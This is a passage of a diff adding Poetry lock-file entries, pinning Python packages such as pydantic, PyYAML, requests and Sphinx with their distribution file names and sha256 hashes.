+py = [ + {file = "py-1.11.0-py2.py3-none-any.whl", hash = "sha256:607c53218732647dff4acdfcd50cb62615cedf612e72d1724fb1a0cc6405b378"}, + {file = "py-1.11.0.tar.gz", hash = "sha256:51c75c4126074b472f746a24399ad32f6053d1b34b68d2fa41e558e6f4a98719"}, +] +pycodestyle = [ + {file = "pycodestyle-2.8.0-py2.py3-none-any.whl", hash = "sha256:720f8b39dde8b293825e7ff02c475f3077124006db4f440dcbc9a20b76548a20"}, + {file = "pycodestyle-2.8.0.tar.gz", hash = "sha256:eddd5847ef438ea1c7870ca7eb78a9d47ce0cdb4851a5523949f2601d0cbbe7f"}, +] +pycparser = [ + {file = "pycparser-2.21-py2.py3-none-any.whl", hash = "sha256:8ee45429555515e1f6b185e78100aea234072576aa43ab53aefcae078162fca9"}, + {file = "pycparser-2.21.tar.gz", hash = "sha256:e644fdec12f7872f86c58ff790da456218b10f863970249516d60a5eaca77206"}, +] +pydantic = [ + {file = "pydantic-1.9.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c8098a724c2784bf03e8070993f6d46aa2eeca031f8d8a048dff277703e6e193"}, + {file = "pydantic-1.9.1-cp310-cp310-macosx_11_0_arm64.whl", hash = 
"sha256:c320c64dd876e45254bdd350f0179da737463eea41c43bacbee9d8c9d1021f11"}, + {file = "pydantic-1.9.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:18f3e912f9ad1bdec27fb06b8198a2ccc32f201e24174cec1b3424dda605a310"}, + {file = "pydantic-1.9.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c11951b404e08b01b151222a1cb1a9f0a860a8153ce8334149ab9199cd198131"}, + {file = "pydantic-1.9.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:8bc541a405423ce0e51c19f637050acdbdf8feca34150e0d17f675e72d119580"}, + {file = "pydantic-1.9.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:e565a785233c2d03724c4dc55464559639b1ba9ecf091288dd47ad9c629433bd"}, + {file = "pydantic-1.9.1-cp310-cp310-win_amd64.whl", hash = "sha256:a4a88dcd6ff8fd47c18b3a3709a89adb39a6373f4482e04c1b765045c7e282fd"}, + {file = "pydantic-1.9.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:447d5521575f18e18240906beadc58551e97ec98142266e521c34968c76c8761"}, + {file = "pydantic-1.9.1-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:985ceb5d0a86fcaa61e45781e567a59baa0da292d5ed2e490d612d0de5796918"}, + {file = "pydantic-1.9.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:059b6c1795170809103a1538255883e1983e5b831faea6558ef873d4955b4a74"}, + {file = "pydantic-1.9.1-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:d12f96b5b64bec3f43c8e82b4aab7599d0157f11c798c9f9c528a72b9e0b339a"}, + {file = "pydantic-1.9.1-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:ae72f8098acb368d877b210ebe02ba12585e77bd0db78ac04a1ee9b9f5dd2166"}, + {file = "pydantic-1.9.1-cp36-cp36m-win_amd64.whl", hash = "sha256:79b485767c13788ee314669008d01f9ef3bc05db9ea3298f6a50d3ef596a154b"}, + {file = "pydantic-1.9.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:494f7c8537f0c02b740c229af4cb47c0d39840b829ecdcfc93d91dcbb0779892"}, + {file = 
"pydantic-1.9.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f0f047e11febe5c3198ed346b507e1d010330d56ad615a7e0a89fae604065a0e"}, + {file = "pydantic-1.9.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:969dd06110cb780da01336b281f53e2e7eb3a482831df441fb65dd30403f4608"}, + {file = "pydantic-1.9.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:177071dfc0df6248fd22b43036f936cfe2508077a72af0933d0c1fa269b18537"}, + {file = "pydantic-1.9.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:9bcf8b6e011be08fb729d110f3e22e654a50f8a826b0575c7196616780683380"}, + {file = "pydantic-1.9.1-cp37-cp37m-win_amd64.whl", hash = "sha256:a955260d47f03df08acf45689bd163ed9df82c0e0124beb4251b1290fa7ae728"}, + {file = "pydantic-1.9.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9ce157d979f742a915b75f792dbd6aa63b8eccaf46a1005ba03aa8a986bde34a"}, + {file = "pydantic-1.9.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:0bf07cab5b279859c253d26a9194a8906e6f4a210063b84b433cf90a569de0c1"}, + {file = "pydantic-1.9.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5d93d4e95eacd313d2c765ebe40d49ca9dd2ed90e5b37d0d421c597af830c195"}, + {file = "pydantic-1.9.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1542636a39c4892c4f4fa6270696902acb186a9aaeac6f6cf92ce6ae2e88564b"}, + {file = "pydantic-1.9.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:a9af62e9b5b9bc67b2a195ebc2c2662fdf498a822d62f902bf27cccb52dbbf49"}, + {file = "pydantic-1.9.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:fe4670cb32ea98ffbf5a1262f14c3e102cccd92b1869df3bb09538158ba90fe6"}, + {file = "pydantic-1.9.1-cp38-cp38-win_amd64.whl", hash = "sha256:9f659a5ee95c8baa2436d392267988fd0f43eb774e5eb8739252e5a7e9cf07e0"}, + {file = "pydantic-1.9.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = 
"sha256:b83ba3825bc91dfa989d4eed76865e71aea3a6ca1388b59fc801ee04c4d8d0d6"}, + {file = "pydantic-1.9.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:1dd8fecbad028cd89d04a46688d2fcc14423e8a196d5b0a5c65105664901f810"}, + {file = "pydantic-1.9.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:02eefd7087268b711a3ff4db528e9916ac9aa18616da7bca69c1871d0b7a091f"}, + {file = "pydantic-1.9.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7eb57ba90929bac0b6cc2af2373893d80ac559adda6933e562dcfb375029acee"}, + {file = "pydantic-1.9.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:4ce9ae9e91f46c344bec3b03d6ee9612802682c1551aaf627ad24045ce090761"}, + {file = "pydantic-1.9.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:72ccb318bf0c9ab97fc04c10c37683d9eea952ed526707fabf9ac5ae59b701fd"}, + {file = "pydantic-1.9.1-cp39-cp39-win_amd64.whl", hash = "sha256:61b6760b08b7c395975d893e0b814a11cf011ebb24f7d869e7118f5a339a82e1"}, + {file = "pydantic-1.9.1-py3-none-any.whl", hash = "sha256:4988c0f13c42bfa9ddd2fe2f569c9d54646ce84adc5de84228cfe83396f3bd58"}, + {file = "pydantic-1.9.1.tar.gz", hash = "sha256:1ed987c3ff29fff7fd8c3ea3a3ea877ad310aae2ef9889a119e22d3f2db0691a"}, +] +pydocstyle = [ + {file = "pydocstyle-6.1.1-py3-none-any.whl", hash = "sha256:6987826d6775056839940041beef5c08cc7e3d71d63149b48e36727f70144dc4"}, + {file = "pydocstyle-6.1.1.tar.gz", hash = "sha256:1d41b7c459ba0ee6c345f2eb9ae827cab14a7533a88c5c6f7e94923f72df92dc"}, +] +pyflakes = [ + {file = "pyflakes-2.4.0-py2.py3-none-any.whl", hash = "sha256:3bb3a3f256f4b7968c9c788781e4ff07dce46bdf12339dcda61053375426ee2e"}, + {file = "pyflakes-2.4.0.tar.gz", hash = "sha256:05a85c2872edf37a4ed30b0cce2f6093e1d0581f8c19d7393122da7e25b2b24c"}, +] +pygithub = [ + {file = "PyGithub-1.55-py3-none-any.whl", hash = "sha256:2caf0054ea079b71e539741ae56c5a95e073b81fa472ce222e81667381b9601b"}, + {file = "PyGithub-1.55.tar.gz", hash = 
"sha256:1bbfff9372047ff3f21d5cd8e07720f3dbfdaf6462fcaed9d815f528f1ba7283"}, +] +pygments = [ + {file = "Pygments-2.12.0-py3-none-any.whl", hash = "sha256:dc9c10fb40944260f6ed4c688ece0cd2048414940f1cea51b8b226318411c519"}, + {file = "Pygments-2.12.0.tar.gz", hash = "sha256:5eb116118f9612ff1ee89ac96437bb6b49e8f04d8a13b514ba26f620208e26eb"}, +] +pyjwt = [ + {file = "PyJWT-2.4.0-py3-none-any.whl", hash = "sha256:72d1d253f32dbd4f5c88eaf1fdc62f3a19f676ccbadb9dbc5d07e951b2b26daf"}, + {file = "PyJWT-2.4.0.tar.gz", hash = "sha256:d42908208c699b3b973cbeb01a969ba6a96c821eefb1c5bfe4c390c01d67abba"}, +] +pynacl = [ + {file = "PyNaCl-1.5.0-cp36-abi3-macosx_10_10_universal2.whl", hash = "sha256:401002a4aaa07c9414132aaed7f6836ff98f59277a234704ff66878c2ee4a0d1"}, + {file = "PyNaCl-1.5.0-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.manylinux_2_24_aarch64.whl", hash = "sha256:52cb72a79269189d4e0dc537556f4740f7f0a9ec41c1322598799b0bdad4ef92"}, + {file = "PyNaCl-1.5.0-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a36d4a9dda1f19ce6e03c9a784a2921a4b726b02e1c736600ca9c22029474394"}, + {file = "PyNaCl-1.5.0-cp36-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:0c84947a22519e013607c9be43706dd42513f9e6ae5d39d3613ca1e142fba44d"}, + {file = "PyNaCl-1.5.0-cp36-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:06b8f6fa7f5de8d5d2f7573fe8c863c051225a27b61e6860fd047b1775807858"}, + {file = "PyNaCl-1.5.0-cp36-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:a422368fc821589c228f4c49438a368831cb5bbc0eab5ebe1d7fac9dded6567b"}, + {file = "PyNaCl-1.5.0-cp36-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:61f642bf2378713e2c2e1de73444a3778e5f0a38be6fee0fe532fe30060282ff"}, + {file = "PyNaCl-1.5.0-cp36-abi3-win32.whl", hash = "sha256:e46dae94e34b085175f8abb3b0aaa7da40767865ac82c928eeb9e57e1ea8a543"}, + {file = "PyNaCl-1.5.0-cp36-abi3-win_amd64.whl", hash = 
"sha256:20f42270d27e1b6a29f54032090b972d97f0a1b0948cc52392041ef7831fee93"}, + {file = "PyNaCl-1.5.0.tar.gz", hash = "sha256:8ac7448f09ab85811607bdd21ec2464495ac8b7c66d146bf545b0f08fb9220ba"}, +] +pyparsing = [ + {file = "pyparsing-3.0.9-py3-none-any.whl", hash = "sha256:5026bae9a10eeaefb61dab2f09052b9f4307d44aee4eda64b309723d8d206bbc"}, + {file = "pyparsing-3.0.9.tar.gz", hash = "sha256:2b020ecf7d21b687f219b71ecad3631f644a47f01403fa1d1036b0c6416d70fb"}, +] +pytest = [ + {file = "pytest-7.1.2-py3-none-any.whl", hash = "sha256:13d0e3ccfc2b6e26be000cb6568c832ba67ba32e719443bfe725814d3c42433c"}, + {file = "pytest-7.1.2.tar.gz", hash = "sha256:a06a0425453864a270bc45e71f783330a7428defb4230fb5e6a731fde06ecd45"}, +] +pytz = [ + {file = "pytz-2022.1-py2.py3-none-any.whl", hash = "sha256:e68985985296d9a66a881eb3193b0906246245294a881e7c8afe623866ac6a5c"}, + {file = "pytz-2022.1.tar.gz", hash = "sha256:1e760e2fe6a8163bc0b3d9a19c4f84342afa0a2affebfaa84b01b978a02ecaa7"}, +] +pyupgrade = [ + {file = "pyupgrade-2.32.1-py2.py3-none-any.whl", hash = "sha256:d874f34870abadd7536c89678f9811076d5df93c13620f90a125355a2d31fa91"}, + {file = "pyupgrade-2.32.1.tar.gz", hash = "sha256:11e2c3e4e2e53a61b2d8852ed154ea5683887b6ac42561622ca8d89c94fd951a"}, +] +pyyaml = [ + {file = "PyYAML-6.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d4db7c7aef085872ef65a8fd7d6d09a14ae91f691dec3e87ee5ee0539d516f53"}, + {file = "PyYAML-6.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9df7ed3b3d2e0ecfe09e14741b857df43adb5a3ddadc919a2d94fbdf78fea53c"}, + {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:77f396e6ef4c73fdc33a9157446466f1cff553d979bd00ecb64385760c6babdc"}, + {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a80a78046a72361de73f8f395f1f1e49f956c6be882eed58505a15f3e430962b"}, + {file = "PyYAML-6.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", 
hash = "sha256:f84fbc98b019fef2ee9a1cb3ce93e3187a6df0b2538a651bfb890254ba9f90b5"}, + {file = "PyYAML-6.0-cp310-cp310-win32.whl", hash = "sha256:2cd5df3de48857ed0544b34e2d40e9fac445930039f3cfe4bcc592a1f836d513"}, + {file = "PyYAML-6.0-cp310-cp310-win_amd64.whl", hash = "sha256:daf496c58a8c52083df09b80c860005194014c3698698d1a57cbcfa182142a3a"}, + {file = "PyYAML-6.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:897b80890765f037df3403d22bab41627ca8811ae55e9a722fd0392850ec4d86"}, + {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50602afada6d6cbfad699b0c7bb50d5ccffa7e46a3d738092afddc1f9758427f"}, + {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:48c346915c114f5fdb3ead70312bd042a953a8ce5c7106d5bfb1a5254e47da92"}, + {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:98c4d36e99714e55cfbaaee6dd5badbc9a1ec339ebfc3b1f52e293aee6bb71a4"}, + {file = "PyYAML-6.0-cp36-cp36m-win32.whl", hash = "sha256:0283c35a6a9fbf047493e3a0ce8d79ef5030852c51e9d911a27badfde0605293"}, + {file = "PyYAML-6.0-cp36-cp36m-win_amd64.whl", hash = "sha256:07751360502caac1c067a8132d150cf3d61339af5691fe9e87803040dbc5db57"}, + {file = "PyYAML-6.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:819b3830a1543db06c4d4b865e70ded25be52a2e0631ccd2f6a47a2822f2fd7c"}, + {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:473f9edb243cb1935ab5a084eb238d842fb8f404ed2193a915d1784b5a6b5fc0"}, + {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0ce82d761c532fe4ec3f87fc45688bdd3a4c1dc5e0b4a19814b9009a29baefd4"}, + {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:231710d57adfd809ef5d34183b8ed1eeae3f76459c18fb4a0b373ad56bedcdd9"}, + {file = "PyYAML-6.0-cp37-cp37m-win32.whl", 
hash = "sha256:c5687b8d43cf58545ade1fe3e055f70eac7a5a1a0bf42824308d868289a95737"}, + {file = "PyYAML-6.0-cp37-cp37m-win_amd64.whl", hash = "sha256:d15a181d1ecd0d4270dc32edb46f7cb7733c7c508857278d3d378d14d606db2d"}, + {file = "PyYAML-6.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0b4624f379dab24d3725ffde76559cff63d9ec94e1736b556dacdfebe5ab6d4b"}, + {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:213c60cd50106436cc818accf5baa1aba61c0189ff610f64f4a3e8c6726218ba"}, + {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9fa600030013c4de8165339db93d182b9431076eb98eb40ee068700c9c813e34"}, + {file = "PyYAML-6.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:277a0ef2981ca40581a47093e9e2d13b3f1fbbeffae064c1d21bfceba2030287"}, + {file = "PyYAML-6.0-cp38-cp38-win32.whl", hash = "sha256:d4eccecf9adf6fbcc6861a38015c2a64f38b9d94838ac1810a9023a0609e1b78"}, + {file = "PyYAML-6.0-cp38-cp38-win_amd64.whl", hash = "sha256:1e4747bc279b4f613a09eb64bba2ba602d8a6664c6ce6396a4d0cd413a50ce07"}, + {file = "PyYAML-6.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:055d937d65826939cb044fc8c9b08889e8c743fdc6a32b33e2390f66013e449b"}, + {file = "PyYAML-6.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:e61ceaab6f49fb8bdfaa0f92c4b57bcfbea54c09277b1b4f7ac376bfb7a7c174"}, + {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d67d839ede4ed1b28a4e8909735fc992a923cdb84e618544973d7dfc71540803"}, + {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:cba8c411ef271aa037d7357a2bc8f9ee8b58b9965831d9e51baf703280dc73d3"}, + {file = "PyYAML-6.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:40527857252b61eacd1d9af500c3337ba8deb8fc298940291486c465c8b46ec0"}, + {file = "PyYAML-6.0-cp39-cp39-win32.whl", 
hash = "sha256:b5b9eccad747aabaaffbc6064800670f0c297e52c12754eb1d976c57e4f74dcb"}, + {file = "PyYAML-6.0-cp39-cp39-win_amd64.whl", hash = "sha256:b3d267842bf12586ba6c734f89d1f5b871df0273157918b0ccefa29deb05c21c"}, + {file = "PyYAML-6.0.tar.gz", hash = "sha256:68fb519c14306fec9720a2a5b45bc9f0c8d1b9c72adf45c37baedfcd949c35a2"}, +] +reorder-python-imports = [ + {file = "reorder_python_imports-2.8.0-py2.py3-none-any.whl", hash = "sha256:03354608c610a25cba75a352ad86552849dcf3c90849fcb415298efc911a4ecf"}, + {file = "reorder_python_imports-2.8.0.tar.gz", hash = "sha256:435af2a6feb39de3c4b7a415079f85b4b0052d3a7ed9ea7b269b0aff725abdaf"}, +] +requests = [ + {file = "requests-2.28.0-py3-none-any.whl", hash = "sha256:bc7861137fbce630f17b03d3ad02ad0bf978c844f3536d0edda6499dafce2b6f"}, + {file = "requests-2.28.0.tar.gz", hash = "sha256:d568723a7ebd25875d8d1eaf5dfa068cd2fc8194b2e483d7b1f7c81918dbec6b"}, +] +restructuredtext-lint = [ + {file = "restructuredtext_lint-1.4.0.tar.gz", hash = "sha256:1b235c0c922341ab6c530390892eb9e92f90b9b75046063e047cacfb0f050c45"}, +] +rfc3986 = [ + {file = "rfc3986-1.5.0-py2.py3-none-any.whl", hash = "sha256:a86d6e1f5b1dc238b218b012df0aa79409667bb209e58da56d0b94704e712a97"}, + {file = "rfc3986-1.5.0.tar.gz", hash = "sha256:270aaf10d87d0d4e095063c65bf3ddbc6ee3d0b226328ce21e036f946e421835"}, +] +"ruamel.yaml" = [ + {file = "ruamel.yaml-0.17.21-py3-none-any.whl", hash = "sha256:742b35d3d665023981bd6d16b3d24248ce5df75fdb4e2924e93a05c1f8b61ca7"}, + {file = "ruamel.yaml-0.17.21.tar.gz", hash = "sha256:8b7ce697a2f212752a35c1ac414471dc16c424c9573be4926b56ff3f5d23b7af"}, +] +"ruamel.yaml.clib" = [ + {file = "ruamel.yaml.clib-0.2.6-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:6e7be2c5bcb297f5b82fee9c665eb2eb7001d1050deaba8471842979293a80b0"}, + {file = "ruamel.yaml.clib-0.2.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:221eca6f35076c6ae472a531afa1c223b9c29377e62936f61bc8e6e8bdc5f9e7"}, + {file = 
"ruamel.yaml.clib-0.2.6-cp310-cp310-win32.whl", hash = "sha256:1070ba9dd7f9370d0513d649420c3b362ac2d687fe78c6e888f5b12bf8bc7bee"}, + {file = "ruamel.yaml.clib-0.2.6-cp310-cp310-win_amd64.whl", hash = "sha256:77df077d32921ad46f34816a9a16e6356d8100374579bc35e15bab5d4e9377de"}, + {file = "ruamel.yaml.clib-0.2.6-cp35-cp35m-macosx_10_6_intel.whl", hash = "sha256:cfdb9389d888c5b74af297e51ce357b800dd844898af9d4a547ffc143fa56751"}, + {file = "ruamel.yaml.clib-0.2.6-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:7b2927e92feb51d830f531de4ccb11b320255ee95e791022555971c466af4527"}, + {file = "ruamel.yaml.clib-0.2.6-cp35-cp35m-win32.whl", hash = "sha256:ada3f400d9923a190ea8b59c8f60680c4ef8a4b0dfae134d2f2ff68429adfab5"}, + {file = "ruamel.yaml.clib-0.2.6-cp35-cp35m-win_amd64.whl", hash = "sha256:de9c6b8a1ba52919ae919f3ae96abb72b994dd0350226e28f3686cb4f142165c"}, + {file = "ruamel.yaml.clib-0.2.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:d67f273097c368265a7b81e152e07fb90ed395df6e552b9fa858c6d2c9f42502"}, + {file = "ruamel.yaml.clib-0.2.6-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:72a2b8b2ff0a627496aad76f37a652bcef400fd861721744201ef1b45199ab78"}, + {file = "ruamel.yaml.clib-0.2.6-cp36-cp36m-win32.whl", hash = "sha256:9efef4aab5353387b07f6b22ace0867032b900d8e91674b5d8ea9150db5cae94"}, + {file = "ruamel.yaml.clib-0.2.6-cp36-cp36m-win_amd64.whl", hash = "sha256:846fc8336443106fe23f9b6d6b8c14a53d38cef9a375149d61f99d78782ea468"}, + {file = "ruamel.yaml.clib-0.2.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0847201b767447fc33b9c235780d3aa90357d20dd6108b92be544427bea197dd"}, + {file = "ruamel.yaml.clib-0.2.6-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:78988ed190206672da0f5d50c61afef8f67daa718d614377dcd5e3ed85ab4a99"}, + {file = "ruamel.yaml.clib-0.2.6-cp37-cp37m-win32.whl", hash = "sha256:a49e0161897901d1ac9c4a79984b8410f450565bbad64dbfcbf76152743a0cdb"}, + {file = "ruamel.yaml.clib-0.2.6-cp37-cp37m-win_amd64.whl", hash = 
"sha256:bf75d28fa071645c529b5474a550a44686821decebdd00e21127ef1fd566eabe"}, + {file = "ruamel.yaml.clib-0.2.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:a32f8d81ea0c6173ab1b3da956869114cae53ba1e9f72374032e33ba3118c233"}, + {file = "ruamel.yaml.clib-0.2.6-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:7f7ecb53ae6848f959db6ae93bdff1740e651809780822270eab111500842a84"}, + {file = "ruamel.yaml.clib-0.2.6-cp38-cp38-win32.whl", hash = "sha256:89221ec6d6026f8ae859c09b9718799fea22c0e8da8b766b0b2c9a9ba2db326b"}, + {file = "ruamel.yaml.clib-0.2.6-cp38-cp38-win_amd64.whl", hash = "sha256:31ea73e564a7b5fbbe8188ab8b334393e06d997914a4e184975348f204790277"}, + {file = "ruamel.yaml.clib-0.2.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:dc6a613d6c74eef5a14a214d433d06291526145431c3b964f5e16529b1842bed"}, + {file = "ruamel.yaml.clib-0.2.6-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:1866cf2c284a03b9524a5cc00daca56d80057c5ce3cdc86a52020f4c720856f0"}, + {file = "ruamel.yaml.clib-0.2.6-cp39-cp39-win32.whl", hash = "sha256:3fb9575a5acd13031c57a62cc7823e5d2ff8bc3835ba4d94b921b4e6ee664104"}, + {file = "ruamel.yaml.clib-0.2.6-cp39-cp39-win_amd64.whl", hash = "sha256:825d5fccef6da42f3c8eccd4281af399f21c02b32d98e113dbc631ea6a6ecbc7"}, + {file = "ruamel.yaml.clib-0.2.6.tar.gz", hash = "sha256:4ff604ce439abb20794f05613c374759ce10e3595d1867764dd1ae675b85acbd"}, +] +safety = [ + {file = "safety-1.10.3-py2.py3-none-any.whl", hash = "sha256:5f802ad5df5614f9622d8d71fedec2757099705c2356f862847c58c6dfe13e84"}, + {file = "safety-1.10.3.tar.gz", hash = "sha256:30e394d02a20ac49b7f65292d19d38fa927a8f9582cdfd3ad1adbbc66c641ad5"}, +] +six = [ + {file = "six-1.16.0-py2.py3-none-any.whl", hash = "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254"}, + {file = "six-1.16.0.tar.gz", hash = "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926"}, +] +smmap = [ + {file = "smmap-5.0.0-py3-none-any.whl", hash = 
"sha256:2aba19d6a040e78d8b09de5c57e96207b09ed71d8e55ce0959eeee6c8e190d94"}, + {file = "smmap-5.0.0.tar.gz", hash = "sha256:c840e62059cd3be204b0c9c9f74be2c09d5648eddd4580d9314c3ecde0b30936"}, +] +sniffio = [ + {file = "sniffio-1.2.0-py3-none-any.whl", hash = "sha256:471b71698eac1c2112a40ce2752bb2f4a4814c22a54a3eed3676bc0f5ca9f663"}, + {file = "sniffio-1.2.0.tar.gz", hash = "sha256:c4666eecec1d3f50960c6bdf61ab7bc350648da6c126e3cf6898d8cd4ddcd3de"}, +] +snowballstemmer = [ + {file = "snowballstemmer-2.2.0-py2.py3-none-any.whl", hash = "sha256:c8e1716e83cc398ae16824e5572ae04e0d9fc2c6b985fb0f900f5f0c96ecba1a"}, + {file = "snowballstemmer-2.2.0.tar.gz", hash = "sha256:09b16deb8547d3412ad7b590689584cd0fe25ec8db3be37788be3810cbf19cb1"}, +] +soupsieve = [ + {file = "soupsieve-2.3.2.post1-py3-none-any.whl", hash = "sha256:3b2503d3c7084a42b1ebd08116e5f81aadfaea95863628c80a3b774a11b7c759"}, + {file = "soupsieve-2.3.2.post1.tar.gz", hash = "sha256:fc53893b3da2c33de295667a0e19f078c14bf86544af307354de5fcf12a3f30d"}, +] +sphinx = [ + {file = "Sphinx-4.3.2-py3-none-any.whl", hash = "sha256:6a11ea5dd0bdb197f9c2abc2e0ce73e01340464feaece525e64036546d24c851"}, + {file = "Sphinx-4.3.2.tar.gz", hash = "sha256:0a8836751a68306b3fe97ecbe44db786f8479c3bf4b80e3a7f5c838657b4698c"}, +] +sphinx-autobuild = [ + {file = "sphinx-autobuild-2021.3.14.tar.gz", hash = "sha256:de1ca3b66e271d2b5b5140c35034c89e47f263f2cd5db302c9217065f7443f05"}, + {file = "sphinx_autobuild-2021.3.14-py3-none-any.whl", hash = "sha256:8fe8cbfdb75db04475232f05187c776f46f6e9e04cacf1e49ce81bdac649ccac"}, +] +sphinx-click = [ + {file = "sphinx-click-3.1.0.tar.gz", hash = "sha256:36dbf271b1d2600fb05bd598ddeed0b6b6acf35beaf8bc9d507ba7716b232b0e"}, + {file = "sphinx_click-3.1.0-py3-none-any.whl", hash = "sha256:8fb0b048a577d346d741782e44d041d7e908922858273d99746f305870116121"}, +] +sphinxcontrib-applehelp = [ + {file = "sphinxcontrib-applehelp-1.0.2.tar.gz", hash = 
"sha256:a072735ec80e7675e3f432fcae8610ecf509c5f1869d17e2eecff44389cdbc58"}, + {file = "sphinxcontrib_applehelp-1.0.2-py2.py3-none-any.whl", hash = "sha256:806111e5e962be97c29ec4c1e7fe277bfd19e9652fb1a4392105b43e01af885a"}, +] +sphinxcontrib-devhelp = [ + {file = "sphinxcontrib-devhelp-1.0.2.tar.gz", hash = "sha256:ff7f1afa7b9642e7060379360a67e9c41e8f3121f2ce9164266f61b9f4b338e4"}, + {file = "sphinxcontrib_devhelp-1.0.2-py2.py3-none-any.whl", hash = "sha256:8165223f9a335cc1af7ffe1ed31d2871f325254c0423bc0c4c7cd1c1e4734a2e"}, +] +sphinxcontrib-htmlhelp = [ + {file = "sphinxcontrib-htmlhelp-2.0.0.tar.gz", hash = "sha256:f5f8bb2d0d629f398bf47d0d69c07bc13b65f75a81ad9e2f71a63d4b7a2f6db2"}, + {file = "sphinxcontrib_htmlhelp-2.0.0-py2.py3-none-any.whl", hash = "sha256:d412243dfb797ae3ec2b59eca0e52dac12e75a241bf0e4eb861e450d06c6ed07"}, +] +sphinxcontrib-jsmath = [ + {file = "sphinxcontrib-jsmath-1.0.1.tar.gz", hash = 